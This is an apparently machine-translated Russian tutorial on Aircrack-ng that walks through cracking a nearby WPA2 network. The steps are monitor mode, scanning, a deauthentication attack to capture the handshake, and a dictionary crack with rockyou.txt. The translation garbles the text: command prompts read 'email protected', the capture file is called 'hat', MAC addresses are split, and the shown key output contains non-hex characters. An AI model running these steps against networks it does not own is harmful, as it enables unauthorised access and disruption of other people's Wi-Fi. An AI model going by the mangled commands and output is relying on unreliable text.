трещина

Как использовать Aircrack-ng

Как использовать Aircrack-ng
В большинстве случаев люди никогда не думают о сети, к которой они подключены. Они никогда не задумываются, насколько безопасна эта сеть и насколько ежедневно они рискуют своими конфиденциальными данными. Вы можете запускать проверки уязвимостей в своих сетях Wi-Fi с помощью очень мощного инструмента под названием Aircrack-ng и Wireshark. Wireshark используется для мониторинга сетевой активности. Aircrack-ng больше похож на агрессивный инструмент, который позволяет взламывать и предоставлять доступ к беспроводным соединениям. Мыслить как злоумышленник всегда было самым безопасным способом защитить себя от взлома. Вы можете понять, какие именно действия предпримет злоумышленник, чтобы получить доступ к вашей системе, узнав об aircrack. Затем вы можете провести проверку соответствия в своей собственной системе, чтобы убедиться, что она небезопасна.

Aircrack-ng представляет собой полный набор программного обеспечения, предназначенного для проверки безопасности сети Wi-Fi. Это не просто инструмент, а набор инструментов, каждый из которых выполняет определенную задачу. Можно работать над различными областями безопасности Wi-Fi, такими как мониторинг точки доступа, тестирование, атака на сеть, взлом сети Wi-Fi и ее тестирование. Ключевая задача Aircrack - перехватывать пакеты и расшифровывать хеш-коды для взлома паролей. Он поддерживает почти все новые беспроводные интерфейсы. Aircrack-ng это улучшенная версия устаревшего набора инструментов Aircrack, ng относится к Новое поколение. Некоторые из замечательных инструментов, которые работают вместе для решения более сложной задачи.

Airmon-ng:

Airmon-ng входит в комплект aircrack-ng, который переводит сетевую карту в режим монитора. Сетевые карты обычно принимают только пакеты, предназначенные для них, как определено MAC-адресом сетевого адаптера, но с airmon-ng все беспроводные пакеты, независимо от того, нацелены они на них или нет, также будут приняты. Вы должны иметь возможность перехватывать эти пакеты без связывания или аутентификации с точкой доступа. Он используется для проверки состояния точки доступа, переводя сетевой интерфейс в режим мониторинга. Во-первых, нужно настроить беспроводные карты для включения режима монитора, а затем убить все фоновые процессы, если вы думаете, что какой-либо процесс ему мешает. После завершения процессов режим монитора можно включить на беспроводном интерфейсе, выполнив следующую команду:

[электронная почта защищена]: ~ $ sudo airmon-ng start wlan0 #

Вы также можете отключить режим монитора, остановив airmon-ng в любое время, используя следующую команду:

[электронная почта защищена]: ~ $ sudo airmon-ng stop wlan0 #

Airodump-ng:

Airodump-ng используется для составления списка всех окружающих нас сетей и просмотра ценной информации о них. Основная функциональность airodump-ng заключается в том, чтобы обнюхивать пакеты, поэтому он, по сути, запрограммирован на захват всех пакетов вокруг нас, будучи переведенным в режим мониторинга. Мы запустим его для всех подключений вокруг нас и соберем данные, такие как количество клиентов, подключенных к сети, их соответствующие MAC-адреса, стиль шифрования и имена каналов, а затем начнем нацеливаться на нашу целевую сеть.

Набрав команду airodump-ng и указав ей имя сетевого интерфейса в качестве параметра, мы можем активировать этот инструмент. В нем будут перечислены все точки доступа, количество пакетов данных, используемые методы шифрования и аутентификации, а также имя сети (ESSID). С точки зрения взлома, MAC-адреса являются наиболее важными полями.

[электронная почта защищена]: ~ $ sudo airodump-ng wlx0mon

Aircrack-ng:

Aircrack используется для взлома паролей. После захвата всех пакетов с помощью airodump мы можем взломать ключ с помощью aircrack. Взламывает эти ключи двумя способами: PTW и FMS. Подход PTW осуществляется в два этапа. Сначала используются только пакеты ARP, и только затем, если ключ не взломан после поиска, используются все остальные захваченные пакеты. Плюс подхода PTW в том, что не все пакеты используются для взлома. Во втором подходе i.е., FMS, мы используем как статистические модели, так и алгоритмы грубой силы для взлома ключа. Также можно использовать словарный метод.

Aireplay-ng:

Airplay-ng вводит пакеты в беспроводную сеть для создания или ускорения трафика. Пакеты из двух разных источников могут быть захвачены с помощью aireplay-ng. Первый - это живая сеть, а второй - пакеты из уже существующего файла pcap. Airplay-ng полезен во время атаки деаутентификации, нацеленной на точку беспроводного доступа и пользователя. Более того, вы можете выполнять некоторые атаки, такие как атака кофе-латте, с помощью airplay-ng, инструмента, который позволяет вам получить ключ из клиентской системы.  Вы можете добиться этого, перехватив ARP-пакет, а затем обработав его и отправив обратно в систему. Затем клиент создаст пакет, который может быть захвачен airodump, и aircrack взломает ключ из этого измененного пакета. Некоторые другие варианты атаки airplay-ng включают chopchop, фрагментарную подготовку и т. Д.

Авиабаза-нг:

Airbase-ng используется для преобразования компьютера злоумышленника в скомпрометированную точку подключения, к которой другие могут подключиться. Используя Airbase-ng, вы можете заявить о себе как о легальной точке доступа и проводить атаки типа «злоумышленник в середине» на компьютеры, подключенные к вашей сети. Эти виды атак называются атаками зла-близнеца. Обычным пользователям невозможно отличить легальную точку доступа от поддельной. Итак, угроза злого близнеца - одна из самых опасных беспроводных угроз, с которыми мы сталкиваемся сегодня.

Аиролиб-нг:

Airolib ускоряет процесс взлома за счет хранения списков паролей и точки доступа и управления ими. Система управления базами данных, используемая этой программой, - SQLite3, которая в основном доступна на всех платформах. Взлом пароля включает вычисление парного главного ключа, с помощью которого извлекается частный временный ключ (PTK). Используя PTK, вы можете определить идентификационный код сообщения кадра (MIC) для данного пакета и теоретически найти MIC, похожий на пакет, поэтому, если PTK был правильным, PMK также был правильным.

Чтобы просмотреть списки паролей и сети доступа, хранящиеся в базе данных, введите следующую команду:

[электронная почта защищена]: ~ $ sudo airolib-ng testdatabase -stats

Здесь testdatabase - это база данных, к которой вы хотите получить доступ или создать, а -stats - это операция, которую вы хотите выполнить с ней. Вы можете выполнять несколько операций с полями базы данных, например, назначать максимальный приоритет некоторому SSID или чему-то еще. Чтобы использовать airolib-ng с aircrack-ng, введите следующую команду:

[электронная почта защищена]: ~ $ sudo aircrack-ng -r testdatabase wpa2.Eapol.шапка

Здесь мы используем уже вычисленные PMK, хранящиеся в база данных тестов для ускорения процесса взлома паролей.

Взлом WPA / WPA2 с помощью Aircrack-ng:

Давайте посмотрим на небольшой пример того, что aircrack-ng может делать с помощью нескольких замечательных инструментов.  Мы взломаем общий ключ сети WPA / WPA2 с помощью словарного метода.

Первое, что нам нужно сделать, это перечислить сетевые интерфейсы, поддерживающие режим монитора. Это можно сделать с помощью следующей команды:

[электронная почта защищена]: ~ $ sudo airmon-ng
Набор микросхем драйвера интерфейса PHY
Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Мы видим интерфейс; Теперь мы должны перевести найденный сетевой интерфейс (wlx0) в режим монитора, используя следующую команду:

[электронная почта защищена]: ~ $ sudo airmon-ng start wlx0

Он включил режим монитора на интерфейсе, называемом wlx0mon.

Теперь мы должны начать прослушивание трансляций ближайших маршрутизаторов через наш сетевой интерфейс, который мы перевели в режим мониторинга.

[электронная почта защищена]: ~ $ sudo airodump-ng wlx0mon
CH 5] [Прошло: 30 с] [2020-12-02 00:17
 
BSSID PWR Маяки # Данные, # / с CH MB ENC CIPHER AUTH ESSID
 
E4: 6F: 13: 04: CE: 31-45 62 27 0 1 54e WPA2 CCMP PSK CrackIt
C4: E9: 84: 76: 10: BE -63 77 0 0 6 54e. WPA2 CCMP PSK HAckme
C8: 3A: 35: A0: 4E: 01-63 84 0 0 8 54e WPA2 CCMP PSK Net07
74: DA: 88: FA: 38: 02-68 28 2 0 11 54e WPA2 CCMP PSK TP-Link_3802
 
Датчик потерянных кадров BSSID STATION PWR Rate
 
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -3 0 - 1e 8 5
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -33 1e- 6e 0 3
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -35 0 - 1 0 6
E4: 6F: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -39 0e- 1 1002 13 

Наша целевая сеть Взломать его в этом случае, который в настоящее время работает на канале 1.

Здесь, чтобы взломать пароль целевой сети, нам нужно захватить 4-стороннее рукопожатие, которое происходит, когда устройство пытается подключиться к сети. Мы можем захватить его, используя следующую команду:

[электронная почта защищена]: ~ $ sudo airodump-ng -c 1 --bssid E4: 6F: 13: 04: CE: 31 -w / home wlx0

-c         : Канал

-bssid: Bssid целевой сети

        : Имя каталога, в который будет помещен файл pcap

Теперь нам нужно подождать, пока устройство подключится к сети, но есть лучший способ зафиксировать рукопожатие. Мы можем деаутентифицировать устройства на AP с помощью атаки деаутентификации, используя следующую команду:

[электронная почта защищена]: ~ $ sudo aireplay-ng -0 -a E4: 6F: 13: 04: CE: 31

а: Bssid целевой сети

-0: Атака деаутентификации

Мы отключили все устройства, и теперь нам нужно дождаться подключения устройства к сети.

CH 1] [Прошло: 30 с] [2020-12-02 00:02] [рукопожатие WPA: E4: 6F: 13: 04: CE: 31
 
BSSID PWR RXQ Маяки # Данные, # / с CH MB ENC CIPHER AUTH E
 
E4: 6F: 13: 04: CE: 31-47 1 228 807 36 1 54e WPA2 CCMP PSK P
 
Датчик потерянных кадров BSSID STATION PWR Rate
 
E4: 6F: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -35 0 - 1 0 1
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -29 0e- 1e 0 22
E4: 6F: 13: 04: CE: 31 88: 28: B3: 30: 27: 7E -31 0e- 1 0 32
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -35 0e- 6e 263 708 CrackIt
E4: 6F: 13: 04: CE: 31 D4: 6A: 6A: 99: ED: E3 -35 0e- 0e 0 86
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -37 0 - 1e 0 1            

Мы получили попадание, и, посмотрев в правый верхний угол рядом со временем, мы увидим, что рукопожатие было зафиксировано. Теперь заглянем в указанную папку ( /дом в нашем случае) для «.pcap" файл.

Чтобы взломать ключ WPA, мы можем использовать следующую команду:

[адрес электронной почты защищен]: ~ $ sudo aircrack-ng -a2 -w rockyou.txt -b E4: 6F: 13: 04: CE: 31 рукопожатие.шапка
b: Bssid целевой сети
-a2: режим WPA2
Rockyou.txt: используемый файл словаря
Рукопожатие.cap: Файл, содержащий захваченное рукопожатие
Aircrack-ng 1.2 бета3
[00:01:49] 10566 ключей протестировано (1017.96 к / с)
КЛЮЧ НАЙДЕН! [ ты поймал меня ]
Мастер-ключ: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D
0C 06 08 ED BC 6B H7 J8 K1 A0 89 6B 7B B F7 6F 50 C
Переходный ключ: 4D C4 5R 6T 76 99 6G 7H 8D EC
H7 J8 K1 A0 89 6B 7B 6D AF 5B 8D 2D A0 89 6B
A5 BD K1 A0 89 6B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A0 89
8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B
MAC: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71

Ключ к нашей целевой сети был успешно взломан.

Заключение:

Беспроводные сети используются повсюду, они используются каждой компанией, от рабочих, использующих смартфоны, до промышленных устройств управления. Согласно исследованиям, в 2021 году почти более 50 процентов интернет-трафика будет осуществляться через Wi-Fi.  Беспроводные сети имеют много преимуществ: связь за пределами дома, быстрый доступ в Интернет в местах, где практически невозможно проложить провода, они могут расширять сеть без прокладки кабелей для любого другого пользователя и могут легко подключать ваши мобильные устройства к домашнему офису, пока вы не находитесь. нет там.

Несмотря на эти преимущества, существует большой вопрос о вашей конфиденциальности и безопасности. Как эти сети; в пределах диапазона передачи маршрутизаторы открыты для всех, они могут быть легко атакованы, а ваши данные могут быть легко скомпрометированы. Например, если вы подключены к какому-либо общедоступному Wi-Fi, любой, кто подключен к этой сети, может легко проверить ваш сетевой трафик, используя некоторый интеллект и с помощью доступных потрясающих инструментов, и даже сбросить его.

Бесплатные движки с открытым исходным кодом для разработки игр для Linux
В этой статье будет рассмотрен список бесплатных игровых движков с открытым исходным кодом, которые можно использовать для разработки 2D- и 3D-игр в L...
Shadow of the Tomb Raider для Linux Учебное пособие
Shadow of the Tomb Raider - двенадцатое дополнение к серии Tomb Raider - франшизе приключенческой игры, созданной Eidos Montreal. Игра была очень хоро...
Как увеличить FPS в Linux?
FPS означает Кадров в секунду. Задача FPS - измерить частоту кадров при воспроизведении видео или во время игры. Проще говоря, количество непрерывных ...